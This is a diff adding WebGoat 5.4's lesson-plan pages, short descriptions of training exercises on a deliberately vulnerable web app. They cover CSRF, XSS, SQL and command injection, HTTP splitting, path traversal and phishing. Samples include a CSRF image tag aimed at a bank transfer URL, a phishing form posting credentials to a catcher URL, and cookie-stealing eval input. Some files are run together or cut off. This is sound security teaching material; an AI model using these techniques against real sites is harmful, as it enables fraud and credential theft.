+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/CSRF.html
@@ -0,0 +1,26 @@
+
+
Lesson Plan Title: How to Perform Cross Site Request Forgery.
+
Concept / Topic To Teach:
+ This lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks.
+
+
+How the attacks works:
+
+Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a page that contains img links like the one below:
+
+
<img src="http://www.mybank.com/sendFunds.do?acctId=123456 "/>
+
+When the victim's browser attempts to render this page, it will issue a request to www.mybank.com to the transferFunds.do page with the specified parameters. The browser will think the link is to get an image, even though it actually is a funds transfer function.
+
+The request will include any cookies associated with the site. Therefore, if the user has authenticated to the site, and has either a permanent cookie or even a current session cookie, the site will have no way to distinguish this from a legitimate user request.
+
+In this way, the attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, or any other function provided by the vulnerable website
+
General Goal(s):
+
+Your goal is to send an email to a newsgroup that contains an image whose URL is pointing to a malicious request. Try to include a 1x1 pixel image that includes a URL. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/ChallengeScreen.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/ChallengeScreen.html
new file mode 100644
index 000000000..b3d9b3321
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/ChallengeScreen.html
@@ -0,0 +1,7 @@
+
+
Lesson Plan Title: Putting it all together
+
Concept / Topic To Teach:
+This lesson creates a challenge that will help the student apply all that they have learned.General Goal(s):
+
Lesson Plan Title: Client Side Filtering
+
Concept / Topic To Teach:
+
+It is always a good practice to send to the client only information which they are supposed
+to have access to. In this lesson, too much information is being sent to the client, creating
+a serious access control problem.
+
+General Goal(s):
+For this exercise, your mission is exploit the extraneous information being returned by the
+server to discover information to which you should not have access.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/ClientSideValidation.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/ClientSideValidation.html
new file mode 100644
index 000000000..e712b6fb7
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/ClientSideValidation.html
@@ -0,0 +1,15 @@
+
+
Lesson Plan Title: Insecure Client Storage
+
Concept / Topic To Teach:
+
+It is always a good practice to validate all input on the server side. Leaving the
+mechanism for validation on the client side leaves it vulnerable to reverse
+engineering. Remember, anything on the client side should not be
+considered a secret.
+
+General Goal(s):
+For this exercise, your mission is to discover a coupon code to receive an unintended
+discount. Then, exploit the use of client side validation to submit an order with a
+cost of zero.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/CommandInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/CommandInjection.html
new file mode 100644
index 000000000..1db97ab80
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/CommandInjection.html
@@ -0,0 +1,12 @@
+
+
Lesson Plan Title: How to Perform Command Injection
+
Concept / Topic To Teach:
+
+Command injection attacks represent a serious threat to any parameter-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack.General Goal(s):
+The user should be able to execute any command on the hosting OS.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/ConcurrencyCart.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/ConcurrencyCart.html
new file mode 100644
index 000000000..4a2f44b75
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/ConcurrencyCart.html
@@ -0,0 +1,22 @@
+
+
+
+
+ Lesson Plan
+
+
+
+
+
Lesson Plan Title: Shopping Cart Concurrency Flaw
+
Concept / Topic To Teach:
+
+ Web applications can handle many HTTP requests simultaneously. Developers often use variables that are not thread safe. Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently. General Goal(s):
+For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price.
+
+
Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
+
Concept / Topic To Teach:
+
+It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.General Goal(s):
+For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
+
+
Lesson Plan Title: CSRF User Prompt By-Pass
+
Concept / Topic To Teach:
+This lesson teaches how to perform CSRF attacks that by-pass user confirmation prompts.
+
+
+How the attacks works:
+
+Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a page
+that contains a 'forged request' to execute commands with the victim's credentials. Prompting
+a user to confirm or cancel the command might sound like a solution, but can be by-passed if
+the prompt is scriptable. This lesson shows how to by-pass such a prompt by issuing another
+forged request. This can also apply to a series of prompts such as a wizard or issuing multiple
+unrelated forged requests.
+
+
+
General Goal(s):
+
+Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains multiple
+malicious requests: the first to transfer funds, and the second a request to confirm the prompt
+that the first request triggered. The URL should point to the CSRF lesson with an extra
+parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the shortcut from the
+left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever
+receives this email and happens to be authenticated at that time will have his funds transferred.
+When you think the attack is successful, refresh the page and you will find the green check on
+the left hand side menu.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/CsrfTokenByPass.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/CsrfTokenByPass.html
new file mode 100644
index 000000000..b0cbe426d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/CsrfTokenByPass.html
@@ -0,0 +1,37 @@
+
+
Lesson Plan Title: CSRF Token Prompt By-Pass
+
Concept / Topic To Teach:
+This lesson teaches how to perform CSRF attacks on sites that use tokens to mitigate CSRF attacks, but are vulnerable to CSS attacks.
+
+
+How the attacks works:
+
+
+Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into
+loading a page that contains a 'forged request' to execute commands with the
+victim's credentials.
+
+
Token-based request authentication mitigates these attacks. This technique
+inserts tokens into pages that issue requests. These tokens are required to
+complete a request, and help verify that requests are not scripted. CSRFGuard from OWASP uses
+this technique to help prevent CSRF attacks.
+
+
However, this technique can be by-passed if CSS vulnerabilities exist on the same site.
+Because of the same-origin browser policy, pages from the same domain can read content from
+other pages from the same domain.
+
+
General Goal(s):
+
+Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains a malicious
+request to transfer funds. To successfully complete you need to obtain a valid request token.
+The page that presents the transfer funds form contains a valid request token. The URL for the
+transfer funds page is the same as this lesson with an extra parameter "transferFunds=main". Load
+this page, read the token and append the token in a forged request to transferFunds. When you think
+the attack is successful, refresh the page and you will find the green check on the left hand side menu.
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/DBCrossSiteScripting.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/DBCrossSiteScripting.html
new file mode 100644
index 000000000..a54fd9ab9
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/DBCrossSiteScripting.html
@@ -0,0 +1,24 @@
+
+
Lesson Plan Title: How to Perform Cross Site Scripting
+(XSS)
+
Concept / Topic To Teach:
+
+It is always a good practice to scrub all inputs, especially those
+inputs that will later be used as parameters to OS commands, scripts,
+and database queries. It is particularly important for content that will
+be permanently stored somewhere. Users should not be able to create
+message content that could cause another user to load an undesirable
+page or undesirable content when the user's message is retrieved.
+General Goal(s):
+For this exercise, you will perform a stored XSS attack.
+You will also implement code changes in the database to defeat
+these attacks.
+
+
Lesson Plan Title: How to Perform SQL Injection
+
Concept / Topic To Teach:
+
+It is always a good practice to scrub all inputs, especially those
+inputs that will later be used as parameters to OS commands, scripts,
+and database queries. Users should not be able to alter the intent of
+commands that are executed on the server, in many cases as a privileged user.
+
+General Goal(s):
+For this exercise, you will perform a SQL Injection attack.
+You will also implement code changes in the database to defeat
+these attacks.
+
+
Lesson Plan Title: How to Perform DOM Injection Attack.
+
Concept / Topic To Teach:
+How to perform DOM injection attacks.
+
+
+How the attacks works:
+
+Some applications specially the ones that uses AJAX manipulates and updates the DOM
+directly using javascript, DHTML and eval() method.
+An attacker may take advantage of that by intercepting the reply and try to inject some
+javascript commands to exploit his attacks.
+
General Goal(s):
+
+* Your victim is a system that takes an activation key to allow you to use it.
+
Lesson Plan Title: DOM Based Cross Site Scripting (XSS)
+
Concept / Topic To Teach:
+
+The Document Object Model (DOM) presents an interesting problem from
+a security standpoint. It allows the content of a web page to be dynamically
+modified, but that can be abused by attackers during a malicious code injection. XSS,
+a type of malicious code injection, can occur when unvalidated user input is used directly
+to modify the content of a page on the client side.
+
+General Goal(s):
+For this exercise, your mission is to use this vulnerability to inject
+malicious code into the DOM. Then in the last stage, you will correct
+the flaws in the code to address the vulnerability.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/DOS_Login.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/DOS_Login.html
new file mode 100644
index 000000000..941a89b49
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/DOS_Login.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: Denial of Service from Multiple Logins
+
Concept / Topic To Teach:
+
+Denial of service attacks are a major issue in web applications. If the end user cannot conduct business or perform the service offered by the web application, then both time and money is wasted.
+General Goal(s):
+This site allows a user to login multiple times. This site has a database connection pool that allows 2 connections. You must obtain a list of valid users and create a total of 3 logins.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/DangerousEval.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/DangerousEval.html
new file mode 100644
index 000000000..f6190530c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/DangerousEval.html
@@ -0,0 +1,14 @@
+
+
Lesson Plan Title: Dangerous Use of Eval
+
Concept / Topic To Teach:
+
+It is always a good practice to validate all input on the server side. XSS can occur
+when unvalidated user input is reflected directly into an HTTP response. In this lesson, unvalidated
+user-supplied data is used in conjunction with a Javascript eval() call. In a reflected
+XSS attack, an attacker can craft a URL with the attack script and store it on another
+website, email it, or otherwise trick a victim into clicking on it.
+
+General Goal(s):
+For this exercise, your mission is to come up with some input which, when run through eval,
+will execute a malicious script. In order to pass this lesson, you must 'alert()' document.cookie.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/Encoding.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/Encoding.html
new file mode 100644
index 000000000..fcba2ddac
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/Encoding.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: How to Peform Basic Encoding
+
Concept / Topic To Teach:
+
+Different encoding schemes can be used in web applications for different reasons.
+
+General Goal(s):
+This lesson will familiarize the user with different encoding schemes.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/FailOpenAuthentication.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/FailOpenAuthentication.html
new file mode 100644
index 000000000..27a82e2cf
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/FailOpenAuthentication.html
@@ -0,0 +1,10 @@
+
+
Lesson Plan Title: How to Bypass Fail Open Authentication
+
Concept / Topic To Teach:
+
+ This lesson presents the basics for understanding the "fail open" condition regarding authentication. The security term, “fail open” describes a behavior of a verification mechanism. This is when an error (i.e. unexpected exception) occurs during a verification method causing that method to evaluate to true. This is especially dangerous during login. General Goal(s):
+ The user should be able to bypass the authentication check.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/ForcedBrowsing.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/ForcedBrowsing.html
new file mode 100644
index 000000000..2bf4fa6a4
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/ForcedBrowsing.html
@@ -0,0 +1,21 @@
+
+
Lesson Plan Title: How to Perform Forced Browsing Attacks.
+
Concept / Topic To Teach:
+How to Exploit Forced Browsing.
+
+
+How the attacks works:
+
+Forced browsing is a technique used by attackers to gain access to resources that are not referenced, but are nevertheless accessible.
+
+One technique is to manipulate the URL in the browser by deleting sections from the end until an unprotected directory is found
+
General Goal(s):
+
+* Your goal should be to try to guess the URL for the "config" interface.
+
Lesson Plan Title: How to Exploit the Forgot Password Page
+
Concept / Topic To Teach:
+
+Web applications frequently provide their users the ability to retrieve a forgotten password. Unfortunately, many web applications fail to implement the mechanism properly. The information required to verify the identity of the user is often overly simplistic.
+General Goal(s):
+Users can retrieve their password if they can answer the secret question properly. There is no lock-out mechanism on this 'Forgot Password' page. Your username is 'webgoat' and your favorite color is 'red'. The goal is to retrieve the password of another user.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/HiddenFieldTampering.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/HiddenFieldTampering.html
new file mode 100644
index 000000000..dff0d945e
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/HiddenFieldTampering.html
@@ -0,0 +1,12 @@
+
+
Lesson Plan Title: How to Exploit Hidden Fields
+
Concept / Topic To Teach:
+
+Developers will use hidden fields for tracking, login, pricing, etc.. information on a loaded page. While this is a convenient and easy mechanism for the developer, they often don't validate the information that is received from the hidden field. This lesson will teach the attacker to find and modify hidden fields to obtain a product for a price other than the price specified General Goal(s):
+The user should be able to exploit a hidden field to obtain a product at an incorrect price.
+
+Try to purchase the HDTV for less than the purchase price, if you have not done so already.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/HowToWork.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/HowToWork.html
new file mode 100644
index 000000000..94cb85851
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/HowToWork.html
@@ -0,0 +1,49 @@
+
+How To Work With WebGoat
+
+Welcome to a short introduction to WebGoat.
+Environment Information
+
+WebGoat uses the Apache Tomcat server. It is configured to run on localhost although this can be
+easily changed. This
+configuration is for single user, additional users can be added in the tomcat-users.xml file.
+If you want to use WebGoat in a laboratory or in
+class you might need to change this setup. Please refer to the Tomcat Configuration
+in the Introduction section.
+
+The WebGoat Interface
+
+
+Solve The Lesson
+
+Always start with the lessons plan. Then try to solve the lesson and if necessary,
+use the hints. The last hint is the solution text if applicable. If you cannot solve the lesson using the hints, you may view the
+solution for complete details.
+Read And Edit Parameters
+
+To read and edit Parameters you need a local proxy to intercept the HTTP request.
+Here we use WebScarab. More information on WebScarab can be found in the "Useful Tools" Chapter.
+After installing WebScarab and configuring your browser to use it as proxy on localhost we can start.
+Read And Edit Cookies
+
+Often it is not only necessary to change the value of the parameters but to change the value of cookies.
+We can use WebScarab to intercept the request and change cookies values just like parameter data as explained in the last topic.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/HtmlClues.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/HtmlClues.html
new file mode 100644
index 000000000..c0d81446c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/HtmlClues.html
@@ -0,0 +1,12 @@
+
+
Lesson Plan Title: How to Discover Clues in the HTML
+
Concept / Topic To Teach:
+
+ Developers are notorious for leaving statements like FIXME's, TODO's, Code Broken, Hack, etc... inside the source code. Review the source code for any comments denoting passwords, backdoors, or something doesn't work right.
+ Below is an example of a forms based authentication form. Look for clues to help you log in.
+
+General Goal(s):
+The user should be able to bypass the authentication check.
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/HttpBasics.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/HttpBasics.html
new file mode 100644
index 000000000..011fed218
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/HttpBasics.html
@@ -0,0 +1,27 @@
+
+
Lesson Plan Title: Http Basics
+
Concept / Topic To Teach:
+ This lesson presents the basics for understanding the transfer of data between the browser and the web application.
+
+How HTTP works:
+
+All HTTP transactions follow the same general format. Each client request and server response has three parts: the request or response line, a header section, and the entity body. The client initiates a transaction as follows:
+
+ The client contacts the server and sends a document request
+
GET /index.html?param=value HTTP/1.0
+ Next, the client sends optional header information to inform the server of its configuration and the document formats it will accept.User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*
+After sending the request and headers, the client may send additional data. This data is mostly used by CGI programs using the POST method.General Goal(s):
+
+Enter your name in the input field below and press "go" to submit. The server will accept the request, reverse the input, and display it back to the user, illustrating the basics of handling an HTTP request.
+
+
Lesson Plan Title: HttpOnly Test
+
Concept / Topic To Teach:
+
+To help mitigate the cross site scripting threat, Microsoft has
+introduced a new cookie attribute entitled 'HttpOnly.' If this flag is
+set, then the browser should not allow client-side script to access the
+cookie. Since the attribute is relatively new, several browsers neglect
+to handle the new attribute properly.
+For a list of supported browsers see: OWASP HTTPOnly Support
+
General Goal(s):
+The purpose of this lesson is to test whether your browser supports the
+HTTPOnly cookie flag. Note the value of the
+unique2u
+cookie. If your browser supports HTTPOnly, and you enable it for a
+cookie, client side code should NOT be able to read OR write to that
+cookie, but the browser can still send its value to the server. Some
+browsers only prevent client side read access, but don't prevent write
+access.
+
+
Lesson Plan Title: How to Perform HTTP Splitting
+
Concept / Topic To Teach:
+ This lesson teaches how to perform HTTP Splitting attacks.
+
+
+How the attack works:
+
+
The attacker passes malicious code to the web server together with normal input.
+A victim application will not be checking for CR (carriage return, also given by %0d or \r)
+and LF (line feed, also given by %0a or \n) characters. These characters not only give attackers control
+of the remaining headers and body of the response the application intends to send,
+but they also allows them to create additional responses entirely under their control.
+
The effect of an HTTP Splitting attack is maximized when accompanied with a Cache Poisoning. The goal of
+Cache Poisoning attack is to poison the cache of the victim by fooling the cache into believing that the page
+hijacked using the HTTP splitting is an authentic version of the server's copy.
+
The attack works by using the HTTP Splitting attack plus adding the Last-Modified: header and setting it
+to a future date. This forces the browser to send an incorrect If-Modified-Since request header on future requests.
+Because of this, the server will always report that the (poisoned) page has not changed, and the victim's browser
+will continue to display the attacked version of the page.
+
A sample of a 304 response is:
+
HTTP/1.1 304 Not Modified
+
+
General Goal(s):
+
+This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.
+Enter a language for the system to search by. You will notice that the application is redirecting your request to another resource on the server. You should be able to use the CR (%0d) and LF (%0a) characters to exploit the attack. Your goal should be to force the server to send a 200 OK. If the screen changed as an effect to your attack, just go back to the homepage. After stage 2 is exploited successfully, you will find the green check in the left menu.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/InsecureLogin.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/InsecureLogin.html
new file mode 100644
index 000000000..a33256309
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/InsecureLogin.html
@@ -0,0 +1,14 @@
+
+
Lesson Plan Title: Insecure Login
+
Concept / Topic To Teach:
+
+Sensitive data should never sent in plaintext! Often applications
+switch to a secure connection after the authorization. An attacker
+could just sniff the login and use the gathered information to
+break into an account. A good webapplication always takes care of
+encrypting sensitive data.
+General Goal(s):
+See how easy it is to sniff a password in plaintext.
+
Lesson Plan Title: How to Perform JSON Injection
+
Concept / Topic To Teach:
+This lesson teaches how to perform JSON Injection Attacks.
+
+
+How the attacks works:
+
+JavaScript Object Notation (JSON) is a simple and effective lightweight data exchange format. JSON can be in a lot of forms such as arrays, lists, hashtables and other data structures.
+JSON is widely used in AJAX and Web2.0 application and is favored by programmers over XML because of its ease of use and speed.
+However, JSON, like XML is prone to Injection attacks. A malicious attacker can inject the reply from the server and inject some arbitrary values in there.
+
+
General Goal(s):
+
+* You are traveling from Boston, MA- Airport code BOS to Seattle, WA - Airport code SEA.
+
Lesson Plan Title: How to Bypass Client Side JavaScript Validation
+
Concept / Topic To Teach:
+
+Client-side validation should not be considered a secure means of validating parameters. These validations only help reduce the amount of server processing time for normal users who do not know the format of required input. Attackers can bypass these mechanisms easily in various ways. Any client-side validation should be duplicated on the server side. This will greatly reduce the likelihood of insecure parameter values being used in the application.
+
+General Goal(s):
+For this exercise, the web site requires that you follow certain rules when you fill out a form. The user should be able to break those rules, and send the website input that it wasn't expecting. You must break all 7 validators at the same time.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/Lesson_Plan_Template.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/Lesson_Plan_Template.html
new file mode 100644
index 000000000..66293a95c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/Lesson_Plan_Template.html
@@ -0,0 +1,17 @@
+
+
+Concept / Topic To Teach:
+Standards Addressed:
+General Goal(s):
+Specific Objectives:
+Required Materials:
+Anticipatory Set (Lead-In):
+Step-By-Step Procedures:
+Plan For Independent Practice:
+Closure (Reflect Anticipatory Set):
+Assessment Based On Objectives:
+Extensions (For Gifted Students):
+Possible Connections To Other Subjects:
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/LogSpoofing.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/LogSpoofing.html
new file mode 100644
index 000000000..105e38f54
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/LogSpoofing.html
@@ -0,0 +1,20 @@
+
+
Lesson Plan Title: How to Perform Log Spoofing.
+
Concept / Topic To Teach:
+ This lesson teaches attempts to fool the human eye.
+
+
+How the attacks works:
+The attack is based on fooling the humane eye in log files. An attacker can erase his traces from the logs
+using this attack.
+
+
General Goal(s):
+
+* The grey area below represents what is going to be logged in the web server's log file.
+
Lesson Plan Title: Multi Level Login 1
+
Concept / Topic To Teach:
+
+A Multi Level Login should provide a strong authentication.
+This is archived by adding a second layer. After having
+logged in with your user name and password you are asked
+for a 'Transaction Authentication Number' (TAN). This is
+often used by online banking. You get a list with a lots
+of TANs generated only for you by the bank. Each TAN is used only once.
+Another method is to provide the TAN by SMS. This has
+the advantage that an attacker can not get TANs provided
+by the user.
+General Goal(s):
+In this Lesson you try to get around the strong authentication.
+You have to break into another account. The user name, password and a
+already used TAN is provided. You have to make sure
+the server accept the TAN even it is already used.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/MultiLevelLogin2.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/MultiLevelLogin2.html
new file mode 100644
index 000000000..3514b7148
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/MultiLevelLogin2.html
@@ -0,0 +1,20 @@
+
+
Lesson Plan Title: Multi Level Login 2
+
Concept / Topic To Teach:
+
+A Multi Level Login should provide a strong authentication.
+This is archived by adding a second layer. After having
+logged in with your user name and password you are asked
+for a 'Transaction Authentication Number' (TAN). This is
+often used by online banking. You get a list with a lots
+of TANs generated only for you by the bank. Each TAN is used only once.
+Another method is to provide the TAN by SMS. This has
+the advantage that an attacker can not get TANs provided
+by the user.
+General Goal(s):
+In this lesson you have to try to break into another account.
+You have an own account for WebGoat Financial but you want to
+log into another account only knowing the user name of the victim
+to attack.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/NewLesson.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/NewLesson.html
new file mode 100644
index 000000000..234b170d8
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/NewLesson.html
@@ -0,0 +1,13 @@
+
+
+Create A WebGoat Lesson
+
+Adding lessons to WebGoat is very easy. If you have an idea that would be suitablehere.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/PasswordStrength.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/PasswordStrength.html
new file mode 100644
index 000000000..d5025216d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/PasswordStrength.html
@@ -0,0 +1,10 @@
+
+
Lesson Plan Title: Password Strength
+
Concept / Topic To Teach:
+
+Accounts are only as secure as their passwords. Most users have the same weak password everywhere. If you want to protect them against brute-force-attacks your application should have good requirements for passwords. The password should contain lower case letters, capitals and numbers. The longer the password, the better.
+
+General Goal(s):
+ For this exercise, your job is to test several passwords on https://www.cnlab.ch/codecheck
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/PathBasedAccessControl.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/PathBasedAccessControl.html
new file mode 100644
index 000000000..235bd2528
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/PathBasedAccessControl.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: How to Bypass a Path Based Access Control Scheme
+
Concept / Topic To Teach:
+
+In a path based access control scheme, an attacker can traverse a path by providing relative path information. Therefore an attacker can use relative paths to access files that normally are not directly accessible by anyone, or would otherwise be denied if requested directly.
+
+General Goal(s):
+The user should be able to access a file that is not in the listed directory.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/Phishing.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/Phishing.html
new file mode 100644
index 000000000..9b0127d14
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/Phishing.html
@@ -0,0 +1,16 @@
+
+
Lesson Plan Title: Phishing with XSS
+
Concept / Topic To Teach:
+
+It is always a good practice to validate all input on the server side.
+ XSS can occur when unvalidated user input is used in an HTTP response.
+ With the help of XSS you can do a Phishing Attack and add content to a page
+ which looks official. It is very hard for a victim to determinate
+ that the content is malicious.
+
+General Goal(s):
+The user should be able to add a form asking for username
+and password. On submit the input should be sent
+to http://localhost/WebGoat/catcher?PROPERTY=yes &user=catchedUserName&password=catchedPasswordName
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/ReflectedXSS.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/ReflectedXSS.html
new file mode 100644
index 000000000..9db959e07
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/ReflectedXSS.html
@@ -0,0 +1,13 @@
+
+
Lesson Plan Title: How to Perform Reflected Cross Site Scripting (XSS)
+
Concept / Topic To Teach:
+
+It is always a good practice to validate all input on the server side.
+ XSS can occur when unvalidated user input is used in an HTTP response.
+ In a reflected XSS attack, an attacker can craft a URL with the attack
+ script and post it to another website, email it, or otherwise get a
+ victim to click on it.
+
+General Goal(s):
+For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script and do something bad.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/RemoteAdminFlaw.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/RemoteAdminFlaw.html
new file mode 100644
index 000000000..e852cbcba
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/RemoteAdminFlaw.html
@@ -0,0 +1,11 @@
+
+
Lesson Plan Title: How to Force Browser Web Resources
+
Concept / Topic To Teach:
+Applications will often have an administrative interface that allows privileged users access to functionality that normal users shouldn't see. The application server will often have an admin interface as well.
+Standards Addressed :
+General Goal(s):
+
+Try to access the administrative interface for WebGoat. You may also try to access the administrative interface for Tomcat. The Tomcat admin interface can be accessed via a URL (/admin) and will not count towards the completion of this lesson.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/RoleBasedAccessControl.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/RoleBasedAccessControl.html
new file mode 100644
index 000000000..132dc235f
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/RoleBasedAccessControl.html
@@ -0,0 +1,15 @@
+
+
Lesson Plan Title: Role Based Access Control
+
Concept / Topic To Teach:
+
+In role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow obtain unauthorized roles.
+
+General Goal(s):
+Your goal is to explore the access control rules that govern this site. Each role has permission to certain resources (A-F). Each user is assigned one or more roles. Only the user with the [Admin] role should have access to the 'F' resources. In a successful attack, a user doesn't have the [Admin] role can access resource F.
+Lesson Resources:
+Org Chart
+Access Control Matrix
+Database Schema
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/SQLInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/SQLInjection.html
new file mode 100644
index 000000000..95f4ae304
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/SQLInjection.html
@@ -0,0 +1,14 @@
+
+
Lesson Plan Title: How to Perform a SQL Injection
+
Concept / Topic To Teach:
+
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
+General Goal(s):
+For this exercise, you will perform SQLInjection attacks. You will also implement code changes in the web application to defeat these attacks.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/en/SameOriginPolicyProtection.html b/webgoat-5.4/src/main/webapp/lesson_plans/en/SameOriginPolicyProtection.html
new file mode 100644
index 000000000..b7db5d10e
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/en/SameOriginPolicyProtection.html
@@ -0,0 +1,13 @@
+
+
